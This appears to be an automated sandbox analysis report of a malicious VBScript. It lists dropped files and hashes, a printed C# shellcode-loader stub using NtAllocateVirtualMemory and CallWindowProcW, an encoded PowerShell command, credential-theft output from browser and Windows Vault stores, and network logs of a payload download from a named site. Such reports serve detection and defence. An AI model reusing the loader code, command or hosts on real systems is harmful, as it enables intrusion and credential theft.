                      SHA-512:E7CA10207747EC4E1AD72867AA7D6FBDDDAE96D6353BDB750AEA7FCD1F4A8997EB28120740A939644460243B8628740C9A04E22E1C1F62739A084F2B3A023A57
                      Malicious:false
                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.j.2.x.f.2.f.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):673
                      Entropy (8bit):5.16161793724357
                      Encrypted:false
                      SSDEEP:12:V/DGrovLxlwOvdVtKMuiSLyLijCJVI8TFwQiP2m:JoovLxGOvDotLsWCHnTd+1
                      MD5:E10418B4412050E3C76BEC0AF627A27D
                      SHA1:966147B4966A8944E51AD98E53D007055CDEB64A
                      SHA-256:5C6EA7E08504357E2F5AB5AB4DE9A5F85F4CE98D0AF8748563257407EEC831E2
                      SHA-512:B00730B4C5275809CD9E42AC4B6330ABF94CE9B27D83B4D21844ADB6E46DAABF1A126193D9BA26D925832F7F3A46FD7A039CDD52802AC239749B8647DC9B78BB
                      Malicious:false
                      Preview: .using System;..using System.Runtime.InteropServices;..public static class bidrags1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);..}
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.266071138526186
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f46pDJ0zxs7+AEszIN723f46p/Hn:p37Lvkmb6K2aQ6pD+WZETaQ6p/Hn
                      MD5:DE6C8A5F7F7F9DF51D896338DFC61245
                      SHA1:A2188907B5B842FB60DBC06CA4C2F95A66775939
                      SHA-256:28879EE84982963E2BAD391F1293B3430B4EDC12BDA9B67B079A9D40259D62DC
                      SHA-512:0D37EBA769FDCA3C33D9AAA7C287349C3E5EE6C37A0932D06D36962F6EF9A089C03232E8601326A9CDFBC1E17A14251152EC40DACE0C9240B31B0FFF3C204777
                      Malicious:false
                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs"
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):3.066019734916757
                      Encrypted:false
                      SSDEEP:48:6IPscOEfEBB7q6Fa9J3H1ulW1Na3J1Oq:JscTfEBBW7SI1NKJ1
                      MD5:90529F8DAAFC1245AB4A8F4013C324AB
                      SHA1:F8B2E16211C0412456005711C6F695316CC72BA3
                      SHA-256:A746A39365D1ACAF4963C06F76D7750AE000D50CEEAAA7767ABFB7FDFE31E8CE
                      SHA-512:72D85E7FD2108D643EE175E2DEE61D5A0044362C2D04AEBAA5B74AEBC5912C26F5E6C0C708C22A17279A0D9835BAC63F34C6C0F8467E9DCA030592775D2EB9FF
                      Malicious:false
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................%... ...@....... ....................................@..................................$..O....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID... ...l...#Blob...........G.........%3............................................................0.)...G.'...m.'.......................................... 7............ O............ [.!.......... d.+.......t.....}.......................................................................................................
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.out
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):876
                      Entropy (8bit):5.325217571265001
                      Encrypted:false
                      SSDEEP:24:KOuqd3ka6K2aF/ETalOKaM5DqBVKVrdFAMBJTH:yika6CF/E+YKxDcVKdBJj
                      MD5:AA96DEDB7C61FFB3A4CA817F5E72B514
                      SHA1:760EF1A4CB3714381A03AB5DF9BA449C1292FF40
                      SHA-256:9821620E1530BB8B01E4A52A526BD11BB5C29CCB94CD72DBBFE31F4E6A26B992
                      SHA-512:B5BF3C34EAF5AECC36C56F89C4B88AE0EB8F5FFC2AD8941E99E769FA631F64919A6A25F9DAD2629CCFDBAD5AF5E79CAE784FBB9B4570A08968EE058047AFAB30
                      Malicious:false
                      Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      C:\Users\user\AppData\Roaming\O118090C\O11logim.jpeg
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                      Category:dropped
                      Size (bytes):90785
                      Entropy (8bit):7.907664631142863
                      Encrypted:false
                      SSDEEP:1536:CnYe+VSZbENKClcUMOEHhEGJNRTO13awF3vUV0dLKPCmHJ9Otpr7wK80q2t2hBgA:uYeiObAlc6kh1ru3VtvUV0oPZp8rf/Up
                      MD5:995FEFB0BA9BFD10B9558867469A86A8
                      SHA1:50DE613E9DF62B7EF869F3F1543FE109032A1664
                      SHA-256:DBE5D5D4A9D14B644AA2DBF237F2E2E011D97DD0D4CEB9D1A9D9431FBB03C97A
                      SHA-512:470278101AE7CC3F09FBD5F2D797063AFD1305BE7837601B3121DAAE786C1CBFA7AA9457294434EE876416AF4F4ABF5C88F44696B1C511145F2D6290261F84CD
                      Malicious:false
                      Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......,....y....q..s..l.cm.J..f$....u.#..g-....za........m..m..~. .w.Lc...6.6.5.h.v..\I..Y..q....f3...b.=0....&.q&.If7....G]..[......g......jz..]$i....y.j.pp:.>.....4.0n.&....<...rX..4...i_...q&.If7....]..[......g...M...bKA.n7^D:..r...\..8...[.Z..;~.....;..........(.i..M....s..J.$.jw...&.q&.Ih7....]..[......g...iw...Z..q..!.f3...b.=0......j.[.{g4!...~V..u....*.lF.
                      C:\Users\user\AppData\Roaming\O118090C\O11logrg.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):38
                      Entropy (8bit):2.7883088224543333
                      Encrypted:false
                      SSDEEP:3:rFGQJhIl:RGQPY
                      MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                      SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                      SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                      SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                      Malicious:false
                      Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                      C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40
                      Entropy (8bit):2.8420918598895937
                      Encrypted:false
                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                      Malicious:true
                      Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                      C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):210
                      Entropy (8bit):3.5313317928937202
                      Encrypted:false
                      SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4olP5K3edr+dEoY:MlIaExGNYvOI6x4oTKOdoY
                      MD5:F00C2EC3AF2BBB73B7B349628B0F8C72
                      SHA1:04D99CF6BA41CF9279B16861D8E681374DE33533
                      SHA-256:619F292C50A38504BFB7B830B2F04A6D7ED8321E944B252F5EA09951E413A46C
                      SHA-512:4D12A0A9651CF302052B4A562EFF4629CBA47B83ECF942DBA2363C04543D05AADD3CC407A47E24FDC858D6D2695249C2CF72F2331B96463CA66F6250B798A2A5
                      Malicious:true
                      Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.l.j.r.k.p.f.k.h.r.q.p.g.y.z.....A.u.t.:.......P.a.s.s.:.......
                      C:\Users\user\Documents\20220113\PowerShell_transcript.675052.bBuy1HxC.20220113145401.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):10574
                      Entropy (8bit):5.1472776153012
                      Encrypted:false
                      SSDEEP:192:hXkDukQ0uUvJ7Yc9AxSGkxibhoat43oL2oLE/SG8jGLbntkZW/11IIWkPkPe:h0aTzk1YVAzcNoat43oL2oLE/SZGLbnr
                      MD5:AA795D00F66E74100D7E3AD5B7744C99
                      SHA1:F633DEE8F6CC827694CD3C4FDF3B9094B1D095CB
                      SHA-256:939EDD3A6D85E45D9985626B4D17A26CCAE7D629CA3E71CBE5BB14623BFAC057
                      SHA-512:B69198792DD0763300D0A9903914FE12A5092CC5B419D1A70B70DA6DFC3AAF31499754B6D91A19CA57741E41A8A242CFA0BB3D8BB2E59989DD5399F403F8A6C4
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220113145415..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 675052 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAA

                      Static File Info

                      General

                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):4.991680425662362
                      TrID:
                      • Visual Basic Script (13500/0) 100.00%
                      File name:MTIR22024323_0553381487_20220112120005.vbs
                      File size:78852
                      MD5:564601676bee71f5f61a44ef170d92a6
                      SHA1:76fca984dab2358e66524172e04a3528f33d8e18
                      SHA256:5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
                      SHA512:a9b778cd8bb8684c9f7f7e0b9d79d17c2b0fab326fbfd59f818c7aaa403bf3fc67cf9944b2149b17e742feff9217c2a2ed3f18e15a8be82dbd4b709f5b86fe1d
                      SSDEEP:1536:c/Y+PmkHWIdXO4ZmzFbQit06zMPbrHo6T0EdXX0y:AF+lzGhdXr
                      File Content Preview:'ravishedm tunneldal totalforb quadrig Smri thri Ital FIBERWA UNBR Havsndensu6 Solmo BNSKR Blunt Spel1 Egromancyd SVEJS fyringsol ..'Eksal damb blaanendek Xoan Famineu Alde8 ENKELTM corusca realloca Basest9 Retteligr6 skgl blgvantefo labbend torpeder EKVI

                      File Icon

                      Icon Hash:e8d69ece869a9ec4

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 13, 2022 14:55:06.092461109 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:06.092494011 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:06.092572927 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:06.124604940 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:06.124631882 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:06.875580072 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:06.875854015 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.197431087 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.197496891 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.198151112 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.198267937 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.207844019 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.249878883 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.457289934 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.458025932 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.703629971 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.703651905 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.703722000 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.703859091 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.703881979 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.703927040 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.703936100 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.703970909 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.704004049 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.950885057 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.950937986 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951066017 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951087952 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951101065 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951153040 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951370001 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951432943 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951507092 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951519966 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951529026 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951590061 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951689005 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951817036 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951829910 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951860905 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:07.951905966 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:07.951926947 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.198566914 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198594093 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198695898 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.198714972 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198749065 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.198753119 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198774099 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.198779106 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198791027 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.198817015 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.198862076 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199076891 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199098110 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199161053 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199172020 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199184895 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199219942 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199405909 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199426889 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199523926 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199537992 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199547052 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199594021 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199687958 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199711084 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199780941 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199791908 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199842930 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.199971914 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.199992895 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.200077057 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.200088978 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.200129986 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.200141907 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.200151920 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.200190067 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.200222015 CET4434977552.68.15.223192.168.2.6
                      Jan 13, 2022 14:55:08.200228930 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.200267076 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.218405008 CET49775443192.168.2.652.68.15.223
                      Jan 13, 2022 14:55:08.218451023 CET4434977552.68.15.223192.168.2.6

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 13, 2022 14:55:06.049655914 CET5177453192.168.2.68.8.8.8
                      Jan 13, 2022 14:55:06.066961050 CET53517748.8.8.8192.168.2.6
                      Jan 13, 2022 14:58:04.611366987 CET5529953192.168.2.68.8.8.8
                      Jan 13, 2022 14:58:04.792109966 CET53552998.8.8.8192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 13, 2022 14:55:06.049655914 CET192.168.2.68.8.8.80xe41dStandard query (0)www.wizumiya.co.jpA (IP address)IN (0x0001)
                      Jan 13, 2022 14:58:04.611366987 CET192.168.2.68.8.8.80x5306Standard query (0)www.jewelrystore1.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 13, 2022 14:55:06.066961050 CET8.8.8.8192.168.2.60xe41dNo error (0)www.wizumiya.co.jp52.68.15.223A (IP address)IN (0x0001)
                      Jan 13, 2022 14:58:04.792109966 CET8.8.8.8192.168.2.60x5306No error (0)www.jewelrystore1.com154.208.173.143A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.wizumiya.co.jp

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.64977552.68.15.223443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      TimestampkBytes transferredDirectionData
                      2022-01-13 13:55:07 UTC0OUTGET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: www.wizumiya.co.jp
                      Cache-Control: no-cache
                      2022-01-13 13:55:07 UTC0INHTTP/1.1 200 OK
                      Date: Thu, 13 Jan 2022 13:55:07 GMT
                      Server: Apache/2.4.18 (Ubuntu)
                      Last-Modified: Wed, 12 Jan 2022 18:28:59 GMT
                      ETag: "2e640-5d566be50ccd5"
                      Accept-Ranges: bytes
                      Content-Length: 190016
                      Connection: close
                      Content-Type: application/octet-stream
                      2022-01-13 13:55:07 UTC0INData Raw: 44 01 d1 dd c1 6d 60 fc 8d 31 58 5e 3e 41 5c 4b 87 62 23 18 b1 8c 66 91 e1 78 2f c9 b3 4c 32 0f ce 71 ff d5 7a d0 5e 3d 9a 8d 4c ea f3 21 1d c7 55 4b f5 e2 4a 2e 35 6f 64 65 34 68 76 6b 5d 70 1c 28 2f c6 27 f2 13 ab 69 8f a8 2f 92 61 4c c4 8b d5 f5 05 39 fe a3 02 d0 78 d4 07 4d 6b d5 27 95 a3 47 46 02 2c bc a2 0b 08 a7 c9 b8 e1 9d 65 bd e3 0b 3a 19 30 4a fe cd ba d4 42 82 07 25 cc 11 e1 e9 b0 d7 8b 93 7d be 83 fc 8d fe b9 11 af 7d 71 da 41 16 ae dd ac c6 4f c7 1e ab 70 d1 eb 50 cf 13 7b b9 8f 42 f0 df de 57 3d 2f 6b 48 56 6f 9a 6a b4 85 3e 26 28 33 94 04 d5 0a 77 7b a8 f2 a7 72 95 c0 26 e1 9a 13 6b db 08 a0 54 db e1 d1 7b 3b c3 04 bd c9 3f d0 51 97 12 83 77 f3 04 5a 04 97 cc 7e ac fa f2 07 e2 8e 9e c6 28 c1 81 0c 37 6f f3 c1 7a 84 38 e9 35 e7 df ad e9 e5
                      Data Ascii: Dm`1X^>A\Kb#fx/L2qz^=L!UKJ.5ode4hvk]p(/'i/aL9xMk'GF,e:0JB%}}qAOpP{BW=/kHVoj>&(3w{r&kT{;?QwZ~(7oz85
                      2022-01-13 13:55:07 UTC16INData Raw: db 1d 77 0c c8 f1 1d 73 38 8d e7 3f cf b3 80 bb 6b 41 64 66 28 8a 69 19 8b 93 b1 76 90 30 d0 c2 8e 43 fc 92 50 3a 4f ff 90 b9 81 66 7a 8c b4 85 e1 4b 3d 3b 31 c5 ea b9 22 56 61 17 c5 82 2a 4a 57 38 63 87 45 08 2f 03 7f bb 07 f0 9b 4b fb 1e a0 bc 6f d8 c1 79 4d aa 6e 2d f4 d5 a4 1f cd 49 fb f5 38 1a 39 a8 aa 88 1c 02 ce 87 2f 83 de 71 56 9f e4 32 aa 2e a7 07 50 9c 5d f0 e1 b3 13 95 48 63 22 3b 5c 1f 4d 92 d3 f4 b2 ed dd 22 c4 2d 7f e4 21 15 fc 34 9d 06 67 9c c5 03 c4 55 31 34 23 d8 07 84 2c 45 85 75 19 da b0 0b 58 ce 8a 2e 0e 40 90 b3 b7 ce a5 4d 49 e1 fd 57 2e ca 0e 73 c4 c4 bd de 87 75 89 25 96 ad 42 50 1b be 87 5d c6 5c 0b 77 69 7d 68 66 ad 67 bc 51 85 b7 73 d9 2c b7 7e ed 9f 28 8e be df 3f 22 a7 86 5d 17 44 e5 d9 10 12 ec a1 10 ca 33 05 1a 72 14 2b 67
                      Data Ascii: ws8?kAdf(iv0CP:OfzK=;1"Va*JW8cE/KoyMn-I89/qV2.P]Hc";\M"-!4gU14#,EuX.@MIW.su%BP]\wi}hfgQs,~(?"]D3r+g
                      2022-01-13 13:55:07 UTC32INData Raw: e2 c0 73 a4 14 c2 b8 96 3d 40 39 ed ec a9 f7 9c 8b b4 cc 85 4d 06 8a 8e 20 f3 08 34 1e 89 77 43 67 50 c0 d4 02 f7 e0 61 af f6 a1 41 69 4a e7 cb e6 87 b0 55 c8 3b 13 47 56 d5 7b 95 98 1b 81 6d b0 6a 89 1a 44 24 e9 f0 76 16 b2 62 26 42 55 0f 21 45 8d 55 b3 ae cd 41 aa 1b d0 35 fc 79 5c 29 02 13 9c 04 16 77 20 f3 06 cb a4 2f 14 0b 6e cb f4 8f 66 ad 9a a6 b6 71 b5 2b fd ae 8c bb a5 e6 35 c8 82 76 d8 5c 04 62 47 ef e1 f7 ba bf 4c fb e1 d4 bb c8 e2 e7 17 03 d1 2a 73 bf 30 eb c5 e9 33 5e 67 3d f9 f5 5a dc 8c 9e 19 12 6a 7d b3 27 1e f7 84 8d 9d 68 2e ed e7 73 d1 7f 7d a2 be e8 a8 00 85 35 b6 c6 89 aa db d5 3b 13 19 f0 56 fb 3b d3 99 45 17 e1 4d 4d ba e9 db 68 0c 07 5f 4b c6 13 6c 23 8d 77 ed b1 ea b3 94 3b 39 7c c0 a2 ad 7f f0 c0 c0 9e ee ec 0b 76 d8 8d 8f 97 e4
                      Data Ascii: s=@9M 4wCgPaAiJU;GV{mjD$vb&BU!EUA5y\)w /nfq+5v\bGL*s03^g=Zj}'h.s}5;V;EMMh_Kl#w;9|v
